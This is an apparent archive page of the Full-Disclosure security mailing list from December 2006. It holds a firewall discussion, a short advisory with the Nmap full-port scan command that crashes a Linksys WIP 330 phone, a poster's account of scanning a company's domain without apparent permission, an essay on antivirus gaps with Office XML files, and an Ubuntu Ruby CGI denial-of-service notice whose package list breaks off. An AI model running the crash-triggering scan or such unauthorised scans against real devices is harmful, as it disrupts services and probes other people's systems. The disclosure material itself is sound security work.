http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061207/3a163e70/attachment.bin From pingywon at hotmail.com Fri Dec 8 05:21:46 2006 From: pingywon at hotmail.com (pingywon) Date: Fri, 8 Dec 2006 00:21:46 -0500 Subject: [Full-disclosure] Hail list! References: <001a01c71907$a4d0c7c0$ee725740$@com> <3da3d8310612062120g1dada3cbjf1bc0f9160dca8c4@mail.gmail.com> Message-ID: have you written a book? you write like an author. - I'd read it ----- Original Message ----- From: "Eliah Kagan" To: Sent: Thursday, December 07, 2006 12:20 AM Subject: Re: [Full-disclosure] Hail list! > On 12/6/06, aNub15 wrote: >> 2. Looking for a low footprint windows firewall that's only supposed to >> do >> one thing. If someone hits port 110, block the I.P for a week? (should >> take >> care of most portscanners (skiddies)). And no I'm not worried about >> blocking >> real users on the box. > > Has it occurred to you that someone could send spoofed SYN packets > with port 110 as the destination, and any IP as the source? Maybe you > should worry about blocking real users after all. If there is an IP > range where you know you have no legitimate users, you should instead > block that IP range. Any IP range where you might have legitimate > users is a range that someone could deny access to easily. Except > actually it would be you denying access to them--a person attacking > you in that way would would likely not even be legally responsible > (but I am not a lawyer). > > Also, why would that prevent access by most people scanning your > ports? Suppose someone is scanning your entire subnet, for instance, > but only on port 22. Or someone could scan lots of ports on your box, > and notice that plenty were open until 110 was probed. This person > could then think one of three things: > > (1) Hmm, I guess that's all the ports open on that box. > (2) Hmm, lots of ports open, and then I scan port 110, and the rest > are all closed/filtered. (This is specially likely if it is the > person's *second* scan.) There must be something nice and juicy on > that box. I will scan the rest of the ports from another IP and then > penetrate any service I can and find out why such a strange measure of > pseudo-security is in place. > (3) Hmm, I was reading Full Disclosure recently and somebody was > asking about how to blacklist IPs for a week that send traffic to port > 110. I bet this is the box of the guy who wanted to know how to do it. > Let's find out why he wanted to do that... > >> www.supernoia.com > > Script kiddies and anybody else who likes portscanning thank you for > the heads up. If you are going to implement this almost certainly bad > idea--and it is for that server--you may wish to at least make it a > different port. > > -Eliah > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From pingywon at hotmail.com Fri Dec 8 05:25:26 2006 From: pingywon at hotmail.com (pingywon) Date: Fri, 8 Dec 2006 00:25:26 -0500 Subject: [Full-disclosure] Linksys WIP 330 VoIP wireless phone crash fromNmap scan References: Message-ID: "The crash > appears related to PhoneCtl.exe running on the phone's Windows CE 4.2 > operating system." "Let me take a look at that screenshot again..." http://www.flickr.com/photos/metalmijn/295348294/ "Heck buddy, you appear correct" ~p ----- Original Message ----- From: "Shawn Merdinger" To: Sent: Wednesday, December 06, 2006 1:40 PM Subject: [Full-disclosure] Linksys WIP 330 VoIP wireless phone crash fromNmap scan > Vulnerability Description > ================== > The Linksys WIP 330 VoIP wireless phone will crash when a full > port-range Nmap scan is run against its IP address. > > > Linksys WIP 330 Firmware Version > ========================== > 1.00.06A > > > Nmap scan command > ================ > nmap -P0 -p 1-65535 > > > Impact > ===== > The crash is only after Nmap has finished. The Nmap scan also seems to > disrupt updating of the display as the clock is not updated. The crash > appears related to PhoneCtl.exe running on the phone's Windows CE 4.2 > operating system. > > Screenshot of the crash: http://www.flickr.com/photos/metalmijn/295348294/ > > > Credit > ==== > Credit for discovering this vulnerability goes to Armijn Hemel > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From pingywon at hotmail.com Fri Dec 8 05:29:49 2006 From: pingywon at hotmail.com (pingywon) Date: Fri, 8 Dec 2006 00:29:49 -0500 Subject: [Full-disclosure] Hail list! References: <001a01c71907$a4d0c7c0$ee725740$@com> Message-ID: that's not to say that there aren't "winblows" boxes internally. but netcraft only does the webserver right? Hell that webserver could even be hosted by a hosting company externally. rather obvious stuff ----- Original Message ----- From: "aNub15" To: Sent: Wednesday, December 06, 2006 2:24 AM Subject: [Full-disclosure] Hail list! > Hail list... > > Could someone with a bit more experience (than me) please verify a few > things. > > I came over a job listing yesterday (sys admin) for a Norwegian company > called rubrikk.no. > The guy who posted it clearly knows nothing about computers, talking about > Windows server 2005, and maintaining perl and reg.ex servers (go figure). > > I ran a quick scan on the domain and found 54 vulns! (GFI Languard) > Netcraft says BSD, but why then is he talking about Winblows. > > Please tell me I found a honeypot? > > If not, please shut down the computer, it should not be on the internet!!! > > ---- > > I also have a couple of questions about software firewalls/routers: > 1. M0n0wall or SmoothWall? > 2. Looking for a low footprint windows firewall that's only supposed to do > one thing. If someone hits port 110, block the I.P for a week? (should > take > care of most portscanners (skiddies)). And no I'm not worried about > blocking > real users on the box. > > Regards > > Simon > www.supernoia.com > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From evdo.hsdpa at gmail.com Fri Dec 8 00:21:23 2006 From: evdo.hsdpa at gmail.com (Robert Kim Wireless Internet Advisor) Date: Thu, 7 Dec 2006 16:21:23 -0800 Subject: [Full-disclosure] Some Thoughts about Office Open XML and Malware Detection In-Reply-To: <010d01c71a1c$e038e520$8210a8c0@moon1> References: <010d01c71a1c$e038e520$8210a8c0@moon1> Message-ID: <1ec620e90612071621i4cb567c1l928b02d3518bdf80@mail.gmail.com> Jan, Does full-disclosure need a digg.com style social news and voting site? lemme know.. i'd be happy to build one for your community. see: http://digg.com and http://wimax-coverage.com and http://iptv-coverage.com On 12/7/06, Jan P. Monsch wrote: > Hi > > Last week I have been googling around for comments and reactions from my > report "Malware Detection Rate in Alternative Word Formats" > (http://www.iplosion.com/archives/3) which was posted in the ISC diary on > August 23rd, 2006 (http://isc.sans.org/diary.php?storyid=1630). To sum it up > there has not been a lot of reactions in magazines or the like but it got at > least the attention of the malware research community. > > There is this very interesting follow-up article from Christoph Alme in the > October 2006 edition of the Virus Bulletin. The two page article "Scanning > Embedded Objects in Word XML Files" > (http://www.securecomputing.com/pdf/CAlme_VBOct06.pdf) which elaborates how > AV products can identify embedded objects in Word XML files. He shows that > XML documents can be manipulated slightly, within the flexibility offered in > the XML standard, and still are considered valid Word documents. Using the > same VirusTotal-based testing method as I did, he demonstrates that all > existing AV products can be bypassed. As you might remember my initial paper > there were only three AV products capable of finding embedded malware in my > run-of-the-mill XML documents. > > So what does this tell us: The most likely reason is that these three virus > scanners do not really understand XML document format. They most likely have > no XML parser integrated or the parser only implements the XML standard > partially. This once again melts down to the conclusion that the decoding > capability is the name of the game. > > Now let us speculate that AV products will integrate a complete > off-the-shelf XML parser. Will this help? Well it will help to properly > decode XML documents but it will most likely introduce new vulnerabilities > in AV products so far unheard of. (Actually the motivation I am writing this > article is to prevent AV vendors to release such broken products). Let us > take XML external DTD references as an example. If the XML parsers are used > in default configuration or are not configured properly, scanning an XML > with an external reference will result in requests to external sites. That > is nice. This would allow an attacker to track malware distribution or > download additional exploit files to the scanning system. > > With the release of Office 2007 a couple of days ago, which will have the > Office Open XML format as standard storage format, the urge for XML enabled > AV products will grow. My retesting today shows that the detection rate of > Netsky as an embedded object in a Office 2003 Word XML is still at the same > level as 3 months ago. I fear that the AV industry is not quite yet ready to > protect their customers against XML delivered attacks. > > Kind regards > Jan P. Monsch > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- Robert Q Kim, Wireless Internet Provider http://evdo-coverage.com/satellite-wireless-internet.html http://evdo-coverage.com 2611 S. Pacific Coast Highway 101 Suite 203 Cardiff by the Sea, CA 92007 206 984 0880 From kees at ubuntu.com Fri Dec 8 05:32:10 2006 From: kees at ubuntu.com (Kees Cook) Date: Thu, 7 Dec 2006 21:32:10 -0800 Subject: [Full-disclosure] [USN-394-1] Ruby vulnerability Message-ID: <20061208053210.GF30964@outflux.net> =========================================================== Ubuntu Security Notice USN-394-1 December 08, 2006 ruby1.8 vulnerability CVE-2006-6303 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 5.10 Ubuntu 6.06 LTS Ubuntu 6.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.10: libruby1.8 1.8.2-9ubuntu1.4 Ubuntu 6.06 LTS: libruby1.8 1.8.4-1ubuntu1.3 Ubuntu 6.10: libruby1.8 1.8.4-5ubuntu1.2 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: An error was found in Ruby's CGI library that did not correctly quote the boundary of multipart MIME requests. Using a crafted HTTP request, a remote user could cause a denial of service, where Ruby CGI applications would end up in a loop, monopolizing a CPU. Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8_1.8.2-9ubuntu1.4.diff.gz Size/MD5: 895120 147af555104a6a38cd084bb2d6829b43 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8_1.8.2-9ubuntu1.4.dsc Size/MD5: 1030 f29857c00e806eb5e998893728594634 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8_1.8.2.orig.tar.gz Size/MD5: 3623780 4bc5254bec262d18cf1ceef03aae8bdf Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/irb1.8_1.8.2-9ubuntu1.4_all.deb Size/MD5: 179094 52c8adf6c346b23e5f29486541dac125 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/rdoc1.8_1.8.2-9ubuntu1.4_all.deb Size/MD5: 244146 8767914c75697629e39e84359d19e16a http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/ri1.8_1.8.2-9ubuntu1.4_all.deb Size/MD5: 719294 94aa64e938b6b5ac37b08880a5eaa427 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/ruby1.8-elisp_1.8.2-9ubuntu1.4_all.deb Size/MD5: 154454 0bb00f14f9fead6309e1662b25233d06 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/ruby1.8-examples_1.8.2-9ubuntu1.4_all.deb Size/MD5: 189130 a527d4eb777f700072ec1f5ca978f483 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libdbm-ruby1.8_1.8.2-9ubuntu1.4_amd64.deb Size/MD5: 141964 715e26d77a5ac1b8a2286e81d5ae28df http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libgdbm-ruby1.8_1.8.2-9ubuntu1.4_amd64.deb Size/MD5: 143194 d6b06ad20e1f932d5724afb0c3d393f6 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libopenssl-ruby1.8_1.8.2-9ubuntu1.4_amd64.deb Size/MD5: 245094 4ee7e8f89795511daba6e7abf6f35dfb http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libreadline-ruby1.8_1.8.2-9ubuntu1.4_amd64.deb Size/MD5: 142596 fe56369a390a1dc644d0bd6ea80784e6 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8-dbg_1.8.2-9ubuntu1.4_amd64.deb Size/MD5: 1005748 0ca73c064ea3dc48b8d33c270777a1a2 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8_1.8.2-9ubuntu1.4_amd64.deb Size/MD5: 1448452 c4c925f0ad3848743a7bdb7dcf6659f5 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libtcltk-ruby1.8_1.8.2-9ubuntu1.4_amd64.deb Size/MD5: 1463364 cc051c6da544bf6c654a4bc3159044ff http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8-dev_1.8.2-9ubuntu1.4_amd64.deb Size/MD5: 687028 c9d0897e1249cc17f481f0a657737125 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8_1.8.2-9ubuntu1.4_amd64.deb Size/MD5: 161362 35d03ad6dcbcaac8104f4d462d61430c i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libdbm-ruby1.8_1.8.2-9ubuntu1.4_i386.deb Size/MD5: 141240 01acf2174c9045824810659cc725364c http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libgdbm-ruby1.8_1.8.2-9ubuntu1.4_i386.deb Size/MD5: 141800 f4c1eb2a4ac0485bbbd655e51558ea21 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libopenssl-ruby1.8_1.8.2-9ubuntu1.4_i386.deb Size/MD5: 230876 72958e174746250419c045491ddfa25e http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libreadline-ruby1.8_1.8.2-9ubuntu1.4_i386.deb Size/MD5: 141596 a5e349fbcfe8511cd32e951dd53bb6ac http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8-dbg_1.8.2-9ubuntu1.4_i386.deb Size/MD5: 837602 b45bc82e59627a2bd2ec7792a6b1d119 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8_1.8.2-9ubuntu1.4_i386.deb Size/MD5: 1365798 bd4dd677dc077846372e6b2ff769a2ab http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libtcltk-ruby1.8_1.8.2-9ubuntu1.4_i386.deb Size/MD5: 1453190 9b80503f3f102327e029bc5d5cb6ba92 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8-dev_1.8.2-9ubuntu1.4_i386.deb Size/MD5: 632806 0bbb7061492ffaf1495db674882f45d3 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8_1.8.2-9ubuntu1.4_i386.deb Size/MD5: 161160 21b59072c75e22c7a1a388612c7b89d9 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libdbm-ruby1.8_1.8.2-9ubuntu1.4_powerpc.deb Size/MD5: 143510 2ff1f073efb10b901b90d02bcdf88dd1 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libgdbm-ruby1.8_1.8.2-9ubuntu1.4_powerpc.deb Size/MD5: 144000 776066ba70a8cc8ea895728c835dab2a http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libopenssl-ruby1.8_1.8.2-9ubuntu1.4_powerpc.deb Size/MD5: 236360 24b7e12b7f29543149c9e12a3bbfb1cf http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libreadline-ruby1.8_1.8.2-9ubuntu1.4_powerpc.deb Size/MD5: 143702 ce4de64fa81946bdc02d1bbb870d848b http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8-dbg_1.8.2-9ubuntu1.4_powerpc.deb Size/MD5: 995878 acf350e4f1c280c66f7c2bdeaa48590d http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8_1.8.2-9ubuntu1.4_powerpc.deb Size/MD5: 1451092 e564260c45f8245fd41f091e7736836c http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libtcltk-ruby1.8_1.8.2-9ubuntu1.4_powerpc.deb Size/MD5: 1462726 7f1202201547e1dc256ec2596cb4f98e http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8-dev_1.8.2-9ubuntu1.4_powerpc.deb Size/MD5: 649916 cb81db640c8a0404ca97572eaa7c16dd http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8_1.8.2-9ubuntu1.4_powerpc.deb Size/MD5: 163096 79cfbf95636e767e7e46f1a450b95d78 Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8_1.8.4-1ubuntu1.3.diff.gz Size/MD5: 35494 2e06d61a3ae071ce6e33436787a62f36 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8_1.8.4-1ubuntu1.3.dsc Size/MD5: 1029 beb1bf46093b4892c71fb79b30e9e369 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8_1.8.4.orig.tar.gz Size/MD5: 4308915 2994203e0815ea978965de34287c5ea2 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/irb1.8_1.8.4-1ubuntu1.3_all.deb Size/MD5: 206754 d2b52d840e85942ff2494ada612c568e http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/rdoc1.8_1.8.4-1ubuntu1.3_all.deb Size/MD5: 271610 b3141dd6c1722563b416356938dde094 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/ri1.8_1.8.4-1ubuntu1.3_all.deb Size/MD5: 756860 250551599ed94711c7630a20fe8e307a http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/ruby1.8-elisp_1.8.4-1ubuntu1.3_all.deb Size/MD5: 181510 bf91eb56a1c9b9c44c7780fabb9fd9d7 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/ruby1.8-examples_1.8.4-1ubuntu1.3_all.deb Size/MD5: 213762 f89016c3be6ed194a15be84a84ab6412 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libdbm-ruby1.8_1.8.4-1ubuntu1.3_amd64.deb Size/MD5: 169188 c5bafdaf33b39e1732b3e68168a087e5 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libgdbm-ruby1.8_1.8.4-1ubuntu1.3_amd64.deb Size/MD5: 170370 48d78390619f61f23d1ba0f86485666a http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libopenssl-ruby1.8_1.8.4-1ubuntu1.3_amd64.deb Size/MD5: 273812 79d6ebcf20cb22d0886678c52cbb7f17 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libreadline-ruby1.8_1.8.4-1ubuntu1.3_amd64.deb Size/MD5: 169824 093698e69b0f7f889db96bfb93b74d16 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8-dbg_1.8.4-1ubuntu1.3_amd64.deb Size/MD5: 1041342 52706266727f798a11c04cd7d075a9cb http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8_1.8.4-1ubuntu1.3_amd64.deb Size/MD5: 1506186 627bc3084f4737bd18f7358170a800c7 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libtcltk-ruby1.8_1.8.4-1ubuntu1.3_amd64.deb Size/MD5: 1797798 7f81fddf80ae18d35e5a9dada2f5c1f7 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8-dev_1.8.4-1ubuntu1.3_amd64.deb Size/MD5: 717388 c4650fbbd872d7726ca92fccf6aef7e2 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8_1.8.4-1ubuntu1.3_amd64.deb Size/MD5: 188750 cae616d7892a76190ed645d286252075 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libdbm-ruby1.8_1.8.4-1ubuntu1.3_i386.deb Size/MD5: 168362 f4b3a29bbccc2913c1379d58a3eb6a68 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libgdbm-ruby1.8_1.8.4-1ubuntu1.3_i386.deb Size/MD5: 168950 0cb15b65a1f8df545756d5bfbdd7d5ef http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libopenssl-ruby1.8_1.8.4-1ubuntu1.3_i386.deb Size/MD5: 258244 9db34679b517d9a121886f7368614cd5 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libreadline-ruby1.8_1.8.4-1ubuntu1.3_i386.deb Size/MD5: 168810 d3a49720119bdf144f56e06f2d66c593 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8-dbg_1.8.4-1ubuntu1.3_i386.deb Size/MD5: 870758 2ffd9092d83ce43a8ea12d561a5aa54f http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8_1.8.4-1ubuntu1.3_i386.deb Size/MD5: 1419924 65be41d4e34d042fa2c6230faf6dccb4 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libtcltk-ruby1.8_1.8.4-1ubuntu1.3_i386.deb Size/MD5: 1789620 40a21760387b4f567c7a17b442975599 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8-dev_1.8.4-1ubuntu1.3_i386.deb Size/MD5: 662342 2c77db7ebd7e427ddf4e9cbee9b3147d http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8_1.8.4-1ubuntu1.3_i386.deb Size/MD5: 188518 9bcdaec0ea9931f4755823ca6164dbd1 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libdbm-ruby1.8_1.8.4-1ubuntu1.3_powerpc.deb Size/MD5: 170626 93ec1afd0c86ebb82d614b7593db849c http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libgdbm-ruby1.8_1.8.4-1ubuntu1.3_powerpc.deb Size/MD5: 171148 0a12b95ebfc2e2a5c5e94d3c7cefa010 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libopenssl-ruby1.8_1.8.4-1ubuntu1.3_powerpc.deb Size/MD5: 264182 eeddb336317506f6603b835a79f1a11f http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libreadline-ruby1.8_1.8.4-1ubuntu1.3_powerpc.deb Size/MD5: 170916 cac9769a58b6342f8c3899be511c3ed5 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8-dbg_1.8.4-1ubuntu1.3_powerpc.deb Size/MD5: 1030968 c07e36a6d9ad82df253498429af90194 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8_1.8.4-1ubuntu1.3_powerpc.deb Size/MD5: 1507974 024b6a75642d9c980099fe5122db3926 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libtcltk-ruby1.8_1.8.4-1ubuntu1.3_powerpc.deb Size/MD5: 1797652 f866baf3e948e8c0cb82f8bc42164a22 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8-dev_1.8.4-1ubuntu1.3_powerpc.deb Size/MD5: 681354 6332169e99a1b8854f1fa49e222bbc39 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8_1.8.4-1ubuntu1.3_powerpc.deb Size/MD5: 190534 0c3eec195c2af1ae11622349013f1b02 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libdbm-ruby1.8_1.8.4-1ubuntu1.3_sparc.deb Size/MD5: 168468 2feee2e23f42bc51196a34dfe887534a http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libgdbm-ruby1.8_1.8.4-1ubuntu1.3_sparc.deb Size/MD5: 169308 065fbfef595dc1e71b7deb087112a9d3 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libopenssl-ruby1.8_1.8.4-1ubuntu1.3_sparc.deb Size/MD5: 266540 856186fcac41e884293be044dc3b11b9 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libreadline-ruby1.8_1.8.4-1ubuntu1.3_sparc.deb Size/MD5: 169088 4123bcc0f25fe4176511d2a7cf49f753 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8-dbg_1.8.4-1ubuntu1.3_sparc.deb Size/MD5: 914846 c1db94b7243763c8f7f81d6157d15f5d http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8_1.8.4-1ubuntu1.3_sparc.deb Size/MD5: 1461434 b8b4a22294aa02db43d37d6236190cf3 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libtcltk-ruby1.8_1.8.4-1ubuntu1.3_sparc.deb Size/MD5: 1793722 0ebc01fbaa7c26d1ac92cf456352e1de http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8-dev_1.8.4-1ubuntu1.3_sparc.deb Size/MD5: 703112 d2de581e42b7924edc18d08738a60e43 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8_1.8.4-1ubuntu1.3_sparc.deb Size/MD5: 188756 563ae96a873592e356b9af469185c0d0 Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8_1.8.4-5ubuntu1.2.diff.gz Size/MD5: 78132 d1054615aea1e6d8f5ce85a5aeca7a20 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8_1.8.4-5ubuntu1.2.dsc Size/MD5: 1056 1c9ecef57d6a54500e4c44eb54c4ab4b http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8_1.8.4.orig.tar.gz Size/MD5: 4308915 2994203e0815ea978965de34287c5ea2 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/irb1.8_1.8.4-5ubuntu1.2_all.deb Size/MD5: 209356 940cfd4f5adfebb97ebe6566d487b74d http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/rdoc1.8_1.8.4-5ubuntu1.2_all.deb Size/MD5: 274256 97aacd569287256140ecb1f0baedeb7d http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/ri1.8_1.8.4-5ubuntu1.2_all.deb Size/MD5: 776630 53fcad620ec4804d6c1bdaab0e84d369 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/ruby1.8-elisp_1.8.4-5ubuntu1.2_all.deb Size/MD5: 184108 9176d3556a58a0ef1267bd4e7f194872 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/ruby1.8-examples_1.8.4-5ubuntu1.2_all.deb Size/MD5: 216396 6e16e795deebf7c996a6cc486092c5b1 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libdbm-ruby1.8_1.8.4-5ubuntu1.2_amd64.deb Size/MD5: 171788 7a1b57221e6d15bdf641d30140166e3e http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libgdbm-ruby1.8_1.8.4-5ubuntu1.2_amd64.deb Size/MD5: 172912 88e25578e336442ab5bc2dcb492b6773 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libopenssl-ruby1.8_1.8.4-5ubuntu1.2_amd64.deb Size/MD5: 276190 934eacca56349c916d8bffeebcde7440 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libreadline-ruby1.8_1.8.4-5ubuntu1.2_amd64.deb Size/MD5: 172408 3fb4b79dbfe2a59b032556b6a09bddb3 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8-dbg_1.8.4-5ubuntu1.2_amd64.deb Size/MD5: 1031924 04c179ab948ea9482edf29c83c4ec24e http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8_1.8.4-5ubuntu1.2_amd64.deb Size/MD5: 1513768 c39e5b9efa1dbf2f6db5bae881e498c6 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libtcltk-ruby1.8_1.8.4-5ubuntu1.2_amd64.deb Size/MD5: 1799864 5cb8f2961b780786712e71ba524dab4a http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8-dev_1.8.4-5ubuntu1.2_amd64.deb Size/MD5: 720830 6a57f20eba15da71bcbc7291b213debf http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8_1.8.4-5ubuntu1.2_amd64.deb Size/MD5: 191360 f12ec94efca32e1f5d2e071741d4b50b i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libdbm-ruby1.8_1.8.4-5ubuntu1.2_i386.deb Size/MD5: 171182 fe3ee1a862bc36bee2d2ac1d358a7d4b http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libgdbm-ruby1.8_1.8.4-5ubuntu1.2_i386.deb Size/MD5: 171774 d19aabd75d984b4ce0e7a6827e7a48e9 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libopenssl-ruby1.8_1.8.4-5ubuntu1.2_i386.deb Size/MD5: 263464 035daa12b3a422e75c476ecdd0aa8a8c http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libreadline-ruby1.8_1.8.4-5ubuntu1.2_i386.deb Size/MD5: 171544 b6a7e4a12be94ceac0fe32fb6465d20e http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8-dbg_1.8.4-5ubuntu1.2_i386.deb Size/MD5: 959940 207404c443999aa6f600b70506a39430 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8_1.8.4-5ubuntu1.2_i386.deb Size/MD5: 1450948 ab350df20b70a1d8bfe39abb6c1d6c25 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libtcltk-ruby1.8_1.8.4-5ubuntu1.2_i386.deb Size/MD5: 1793708 3b1b202266d6f6c4802551b3865d4d48 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8-dev_1.8.4-5ubuntu1.2_i386.deb Size/MD5: 682612 a328c822974314a358d324032efa7dbf http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8_1.8.4-5ubuntu1.2_i386.deb Size/MD5: 191132 52a0cc45a6c914d8266fc5edd0bf6648 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libdbm-ruby1.8_1.8.4-5ubuntu1.2_powerpc.deb Size/MD5: 173318 